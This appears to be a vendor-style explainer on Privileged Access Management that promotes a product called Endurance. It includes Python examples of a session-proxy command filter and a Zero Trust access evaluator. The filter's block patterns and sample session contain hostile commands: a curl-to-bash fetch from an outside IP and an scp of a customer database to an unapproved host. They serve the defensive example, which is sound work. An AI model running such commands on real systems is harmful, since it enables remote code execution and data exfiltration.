PAM (Privileged Access Management) is a security solution designed to mitigate the risks associated with the use and abuse of accounts that hold elevated privileges.
These accounts, which can be human (administrators, developers, etc.) or non-human (services, automated applications, etc.), represent a critical entry point for both internal and external attackers due to their access to sensitive resources and control over systems.
The purpose of a PAM is to provide a comprehensive framework that combines control, monitoring, and protection of these privileged accesses, enabling organizations to adopt a stronger security posture against advanced cyber threats, both in on-premises environments and in hybrid and multicloud infrastructures.
Fundamental components of a PAM
1. Credential Management
- Encrypted storage:
Privileged credentials are stored in a secure vault (password vault) that uses advanced encryption algorithms, such as AES-256 and RSA-2048. This storage ensures that the credentials remain inaccessible even in the event of a server compromise.
- Automatic rotation:
The PAM applies predefined policies to change passwords after each use or after specific intervals, significantly reducing the exposure time of compromised credentials. This process is automatically synchronized with the associated systems to ensure operational continuity.
- Just-in-Time (JIT) access control:
It provides temporary, on-demand access to assets, eliminating the need for standing access and reducing the potential for abuse or theft.
2. Privileged Session Management (PSM)
- Active monitoring:
All sessions initiated by privileged users are intercepted and recorded through intermediate proxies that act as a control point. These recordings include keyboard input, mouse clicks, and system events, stored in encrypted and compressed formats.
- Prevention of malicious activities:
The proxies monitor commands and actions executed within the session, blocking unauthorized operations in real time, such as attempts to run malicious scripts or to transfer files to unapproved locations.
- Support for multiple protocols:
It supports sessions based on RDP, SSH, HTTPS, and VDI, ensuring that every connection method used by privileged accounts is protected.
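The real-time command inspection described under active monitoring and prevention of malicious activities, as an added example that is not code from the original page or from Endurance: a simplified session-proxy filter that runs each captured SSH command against a block list and an allow list of transfer destinations, and emits an audit record for every command. The policy data, host names and the sample session are constructed for the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed policy for the session proxy (hypothetical, not from the original page).
APPROVED_TRANSFER_HOSTS = {"backup.internal.example"}
BLOCKED_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "remote_script_execution"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b"), "encoded_script_execution"),
    (re.compile(r"^\s*(sudo\s+)?(rm\s+-rf\s+/\s*$|mkfs\.|dd\s+if=)"), "destructive_command"),
]
# Captures the remote host of an scp/rsync destination such as user@host:/path
TRANSFER_RE = re.compile(r"\b(scp|rsync)\b.*?\s(?:\S+@)?([\w.-]+):")

@dataclass
class AuditRecord:
    session_id: str
    timestamp: str
    command: str
    action: str        # "allow" or "block"
    reason: str

def inspect_command(session_id: str, command: str, now=None) -> AuditRecord:
    """Decide in real time whether a command typed in a proxied SSH session may run."""
    ts = (now or datetime.now(timezone.utc)).isoformat()
    for pattern, reason in BLOCKED_PATTERNS:
        if pattern.search(command):
            return AuditRecord(session_id, ts, command, "block", reason)
    m = TRANSFER_RE.search(command)
    if m and m.group(2) not in APPROVED_TRANSFER_HOSTS:
        return AuditRecord(session_id, ts, command, "block", "transfer_to_unapproved_host")
    return AuditRecord(session_id, ts, command, "allow", "policy_ok")

def inspect_session(session_id: str, commands, now=None):
    """Run every captured command through the filter and return the full audit trail."""
    return [inspect_command(session_id, c, now) for c in commands]

# Constructed sample session: what a proxy would have captured from a privileged user.
SAMPLE_SESSION = [
    "systemctl status nginx",
    "scp /var/log/nginx/access.log ops@backup.internal.example:/archive/",
    "curl -fsSL http://198.51.100.7/setup.sh | bash",
    "scp /opt/app/customers.db ops@203.0.113.5:/tmp/",
    "tail -n 50 /var/log/syslog",
]

def audit_sample():
    return inspect_session("sess-42", SAMPLE_SESSION, datetime(2024, 11, 28, 10, 0, tzinfo=timezone.utc))
```

In a real deployment the block decision would be enforced by the proxy before the command reaches the target, and the audit records would be written to the encrypted session store.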
3. Granular Access Control
- Context-based policies:
Access authorization is defined using contextual parameters such as geolocation, device status (via integration with EDR solutions), working hours, and the user’s role within the organization.
- Segmented access:
Allows partitioning of resources within the same system, restricting access to specific functions, such as reading logs without allowing configuration modifications.
4. Multifactor Authentication (MFA)
- Additional security layers:
Combines traditional authentication methods (passwords) with biometric factors (fingerprints, facial recognition), physical tokens (YubiKeys), or dynamically generated codes (OTP).
- Resilience against attacks:
It protects against advanced techniques such as phishing, man-in-the-middle (MITM) attacks, and exploitation of static credentials by enforcing multiple layers of authentication.
5. Integration with IT Infrastructures
- Extensive compatibility:
Modern PAM solutions integrate with multiple ITSM solutions, virtualization systems (VMware, Citrix), cloud providers (AWS, Azure, Google Cloud), and OT/IoT environments, enabling unified privileged access management.
- Automation through APIs:
They offer RESTful APIs to facilitate programmatic interaction with other systems, enabling the orchestration of automated workflows related to access management.
6. User and Entity Behavior Analytics (UEBA)
- Baseline behavior modeling:
It uses machine learning algorithms to establish normal behavior patterns for users and entities, generating alerts when significant deviations occur.
- Real-time assessment:
It integrates real-time detection capabilities to identify suspicious activities, such as privilege escalation attempts or access outside of normal hours.
How a PAM works
1. Authentication:
- When a user requests privileged access, the PAM initiates an authentication flow that combines MFA with specific policies, such as allowing access only from approved devices registered in an MDM solution.
2. Permission Assignment:
- Based on the Zero Trust principle, the system does not assume inherent trust in any user or device, verifying each requested access against dynamic, adaptive access policies.
3. Credential Management:
- Credentials are never directly exposed to the user. Instead, the PAM establishes an authenticated session through an intermediary system, managing login and logout automatically.
4. Session monitoring:
- Through proxy technologies, the PAM captures metadata of each interaction, such as commands executed in SSH terminals or paths accessed in RDP connections, ensuring a complete and detailed history of every session.
5. Report and alert generation:
- The collected data is processed using advanced analytics tools to identify trends, provide compliance reports, and generate proactive alerts.
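The authentication and permission-assignment steps above, together with the Just-in-Time access control described under credential management, as an added example that is not code from the original page or from Endurance: a small Zero Trust policy evaluator that checks a privileged access request against MFA, MDM enrollment, EDR posture, geolocation, working hours and role entitlement, and issues a time-boxed JIT grant. The roles, resource names, countries and time window are constructed assumptions.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional

# Constructed policy data (hypothetical organization, not from the original page).
ROLE_RESOURCES = {"dba": {"db-prod-01", "db-prod-02"}, "netops": {"fw-edge-01"}}
APPROVED_COUNTRIES = {"ES", "PT"}
WORK_HOURS = (7, 20)          # allowed from 07:00 up to (not including) 20:00 UTC
JIT_TTL = timedelta(minutes=30)

@dataclass
class AccessRequest:
    user: str
    role: str
    resource: str
    mfa_verified: bool
    device_enrolled: bool     # registered in the MDM
    device_healthy: bool      # EDR posture check passed
    country: str
    when: datetime

@dataclass
class Decision:
    granted: bool
    reasons: list = field(default_factory=list)
    expires_at: Optional[datetime] = None

def evaluate(req: AccessRequest) -> Decision:
    """Zero Trust: every request is verified against all policies; nothing is trusted by default."""
    reasons = []
    if not req.mfa_verified:
        reasons.append("mfa_missing")
    if not req.device_enrolled:
        reasons.append("device_not_in_mdm")
    if not req.device_healthy:
        reasons.append("edr_posture_failed")
    if req.country not in APPROVED_COUNTRIES:
        reasons.append("geolocation_denied")
    if not (WORK_HOURS[0] <= req.when.hour < WORK_HOURS[1]):
        reasons.append("outside_working_hours")
    if req.resource not in ROLE_RESOURCES.get(req.role, set()):
        reasons.append("role_not_entitled")
    if reasons:
        return Decision(False, reasons)
    # JIT: the grant is time-boxed; the broker, not the user, holds the credential.
    return Decision(True, ["all_policies_satisfied"], req.when + JIT_TTL)

def is_grant_valid(decision: Decision, now: datetime) -> bool:
    """A JIT grant expires on its own; the broker re-checks it before every connection."""
    return decision.granted and decision.expires_at is not None and now < decision.expires_at
```

Every denial lists all failed policies rather than only the first, which is what an operator needs when triaging an alert about a rejected privileged request.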
Endurance, a complete solution
Endurance exceeds the traditional PAM standards by implementing features such as:
1. Shielded remote desktop:
- It provides a fully isolated environment from the client device to the privileged resources, ensuring that neither malware on the user’s device nor exfiltration tools can interfere.
2. OT/IT Integration:
- Designed to manage not only IT systems but also physical assets (telecommunication antennas, industrial control valves), ensuring operational continuity in critical OT environments.
3. VDI with Extreme Control:
- VDI environments are dynamically generated with predefined configurations, ensuring that each session is completely isolated from others. Once the session ends, these instances are destroyed, eliminating any persistence.
4. Microsegmentation Management:
- Ability to restrict privileged connections within virtualized or physical networks, ensuring that users can only interact with the nodes that are strictly necessary.
With PAM functionalities, Endurance is a comprehensive solution that integrates advanced technologies to provide seamless protection in the most challenging environments. In conclusion, in an increasingly threat-laden landscape, this solution not only meets modern security requirements but also sets new standards for privileged access management.